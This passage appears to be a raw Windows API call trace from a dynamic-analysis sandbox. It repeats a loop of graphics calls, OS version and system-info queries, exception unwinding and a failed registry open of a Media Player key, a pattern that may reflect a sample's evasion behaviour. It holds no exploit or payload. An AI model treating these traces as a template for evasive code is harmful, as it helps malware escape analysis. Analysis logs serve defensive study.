phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.132] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e0401d9 [0090.132] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c0401dc [0090.132] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045806 [0090.132] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045807 [0090.132] CombineRgn (hrgnDst=0x1045806, hrgnSrc1=0x1e0401d9, hrgnSrc2=0x1c0401dc, iMode=1) returned 1 [0090.132] CombineRgn (hrgnDst=0x1045807, hrgnSrc1=0x1e0401d9, hrgnSrc2=0x1c0401dc, iMode=4) returned 2 [0090.132] CreateSolidBrush (color=0xff) returned 0x2105805 [0090.132] CreateSolidBrush (color=0xff0000) returned 0x1105808 [0090.132] DeleteObject (ho=0x1105808) returned 1 [0090.132] DeleteObject (ho=0x1c0401dc) returned 1 [0090.132] DeleteObject (ho=0x1e0401d9) returned 1 [0090.132] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.132] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.132] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.132] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.132] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.132] BeginPath (hdc=0x0) returned 0 [0090.132] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.132] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.132] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.132] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.132] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.132] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.132] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.132] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.133] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d0401dc [0090.133] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f0401d9 [0090.133] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045809 [0090.133] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104580a [0090.133] CombineRgn (hrgnDst=0x1045809, hrgnSrc1=0x1d0401dc, hrgnSrc2=0x1f0401d9, iMode=1) returned 1 [0090.133] CombineRgn (hrgnDst=0x104580a, hrgnSrc1=0x1d0401dc, hrgnSrc2=0x1f0401d9, iMode=4) returned 2 [0090.133] CreateSolidBrush (color=0xff) returned 0x2105808 [0090.133] CreateSolidBrush (color=0xff0000) returned 0x110580b [0090.133] DeleteObject (ho=0x110580b) returned 1 [0090.133] DeleteObject (ho=0x1f0401d9) returned 1 [0090.133] DeleteObject (ho=0x1d0401dc) returned 1 [0090.133] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.133] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.133] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.133] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.133] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.133] BeginPath (hdc=0x0) returned 0 [0090.133] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.133] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.133] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.133] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.133] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.133] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.133] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.133] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.133] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x200401d9 [0090.133] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e0401dc [0090.133] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104580c [0090.133] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104580d [0090.133] CombineRgn (hrgnDst=0x104580c, hrgnSrc1=0x200401d9, hrgnSrc2=0x1e0401dc, iMode=1) returned 1 [0090.133] CombineRgn (hrgnDst=0x104580d, hrgnSrc1=0x200401d9, hrgnSrc2=0x1e0401dc, iMode=4) returned 2 [0090.133] CreateSolidBrush (color=0xff) returned 0x210580b [0090.133] CreateSolidBrush (color=0xff0000) returned 0x110580e [0090.133] DeleteObject (ho=0x110580e) returned 1 [0090.133] DeleteObject (ho=0x1e0401dc) returned 1 [0090.133] DeleteObject (ho=0x200401d9) returned 1 [0090.133] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.133] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.134] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.134] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.134] BeginPath (hdc=0x0) returned 0 [0090.134] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.134] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.134] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.134] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.134] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.134] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.134] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.134] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f0401dc [0090.134] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x210401d9 [0090.134] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104580f [0090.134] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045810 [0090.134] CombineRgn (hrgnDst=0x104580f, hrgnSrc1=0x1f0401dc, hrgnSrc2=0x210401d9, iMode=1) returned 1 [0090.134] CombineRgn (hrgnDst=0x1045810, hrgnSrc1=0x1f0401dc, hrgnSrc2=0x210401d9, iMode=4) returned 2 [0090.134] CreateSolidBrush (color=0xff) returned 0x210580e [0090.134] CreateSolidBrush (color=0xff0000) returned 0x1105811 [0090.134] DeleteObject (ho=0x1105811) returned 1 [0090.134] DeleteObject (ho=0x210401d9) returned 1 [0090.134] DeleteObject (ho=0x1f0401dc) returned 1 [0090.134] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.134] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.134] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.134] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.134] BeginPath (hdc=0x0) returned 0 [0090.134] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.134] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.134] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.134] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.134] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.135] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.135] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.135] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x220401d9 [0090.135] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x200401dc [0090.135] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045812 [0090.135] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045813 [0090.135] CombineRgn (hrgnDst=0x1045812, hrgnSrc1=0x220401d9, hrgnSrc2=0x200401dc, iMode=1) returned 1 [0090.135] CombineRgn (hrgnDst=0x1045813, hrgnSrc1=0x220401d9, hrgnSrc2=0x200401dc, iMode=4) returned 2 [0090.135] CreateSolidBrush (color=0xff) returned 0x2105811 [0090.135] CreateSolidBrush (color=0xff0000) returned 0x1105814 [0090.135] DeleteObject (ho=0x1105814) returned 1 [0090.135] DeleteObject (ho=0x200401dc) returned 1 [0090.135] DeleteObject (ho=0x220401d9) returned 1 [0090.135] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.135] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.135] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.135] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.135] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.135] BeginPath (hdc=0x0) returned 0 [0090.135] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.135] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.135] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.135] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.135] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.135] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.135] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.135] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.135] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x210401dc [0090.136] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x230401d9 [0090.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045815 [0090.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045816 [0090.136] CombineRgn (hrgnDst=0x1045815, hrgnSrc1=0x210401dc, hrgnSrc2=0x230401d9, iMode=1) returned 1 [0090.136] CombineRgn (hrgnDst=0x1045816, hrgnSrc1=0x210401dc, hrgnSrc2=0x230401d9, iMode=4) returned 2 [0090.136] CreateSolidBrush (color=0xff) returned 0x2105814 [0090.136] CreateSolidBrush (color=0xff0000) returned 0x1105817 [0090.136] DeleteObject (ho=0x1105817) returned 1 [0090.136] DeleteObject (ho=0x230401d9) returned 1 [0090.136] DeleteObject (ho=0x210401dc) returned 1 [0090.136] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.136] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.136] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.136] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.136] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.136] BeginPath (hdc=0x0) returned 0 [0090.136] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.136] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.136] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.136] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.136] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.136] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.136] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.136] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.136] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x240401d9 [0090.136] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x220401dc [0090.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045818 [0090.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045819 [0090.137] CombineRgn (hrgnDst=0x1045818, hrgnSrc1=0x240401d9, hrgnSrc2=0x220401dc, iMode=1) returned 1 [0090.137] CombineRgn (hrgnDst=0x1045819, hrgnSrc1=0x240401d9, hrgnSrc2=0x220401dc, iMode=4) returned 2 [0090.137] CreateSolidBrush (color=0xff) returned 0x2105817 [0090.137] CreateSolidBrush (color=0xff0000) returned 0x110581a [0090.137] DeleteObject (ho=0x110581a) returned 1 [0090.137] DeleteObject (ho=0x220401dc) returned 1 [0090.137] DeleteObject (ho=0x240401d9) returned 1 [0090.137] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.137] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.137] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.137] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.137] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.137] BeginPath (hdc=0x0) returned 0 [0090.137] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.137] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.137] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.137] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.137] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.137] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.137] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.137] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.137] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x230401dc [0090.137] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x250401d9 [0090.137] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104581b [0090.137] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104581c [0090.137] CombineRgn (hrgnDst=0x104581b, hrgnSrc1=0x230401dc, hrgnSrc2=0x250401d9, iMode=1) returned 1 [0090.137] CombineRgn (hrgnDst=0x104581c, hrgnSrc1=0x230401dc, hrgnSrc2=0x250401d9, iMode=4) returned 2 [0090.137] CreateSolidBrush (color=0xff) returned 0x210581a [0090.137] CreateSolidBrush (color=0xff0000) returned 0x110581d [0090.138] DeleteObject (ho=0x110581d) returned 1 [0090.138] DeleteObject (ho=0x250401d9) returned 1 [0090.138] DeleteObject (ho=0x230401dc) returned 1 [0090.138] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.138] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.138] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.138] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.138] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.138] BeginPath (hdc=0x0) returned 0 [0090.138] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.138] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.138] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.138] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.138] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.138] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.138] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.138] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.138] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401d9 [0090.138] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401dc [0090.138] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104581e [0090.138] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104581f [0090.138] CombineRgn (hrgnDst=0x104581e, hrgnSrc1=0x260401d9, hrgnSrc2=0x240401dc, iMode=1) returned 1 [0090.138] CombineRgn (hrgnDst=0x104581f, hrgnSrc1=0x260401d9, hrgnSrc2=0x240401dc, iMode=4) returned 2 [0090.138] CreateSolidBrush (color=0xff) returned 0x210581d [0090.138] CreateSolidBrush (color=0xff0000) returned 0x1105820 [0090.138] DeleteObject (ho=0x1105820) returned 1 [0090.138] DeleteObject (ho=0x240401dc) returned 1 [0090.138] DeleteObject (ho=0x260401d9) returned 1 [0090.138] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.139] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.139] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.139] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.139] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.139] BeginPath (hdc=0x0) returned 0 [0090.139] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.139] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.139] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.139] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.139] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.139] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.139] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.139] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.139] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401dc [0090.139] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401d9 [0090.139] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045821 [0090.139] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045822 [0090.139] CombineRgn (hrgnDst=0x1045821, hrgnSrc1=0x250401dc, hrgnSrc2=0x270401d9, iMode=1) returned 1 [0090.139] CombineRgn (hrgnDst=0x1045822, hrgnSrc1=0x250401dc, hrgnSrc2=0x270401d9, iMode=4) returned 2 [0090.139] CreateSolidBrush (color=0xff) returned 0x2105820 [0090.139] CreateSolidBrush (color=0xff0000) returned 0x1105823 [0090.139] DeleteObject (ho=0x1105823) returned 1 [0090.139] DeleteObject (ho=0x270401d9) returned 1 [0090.139] DeleteObject (ho=0x250401dc) returned 1 [0090.139] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, 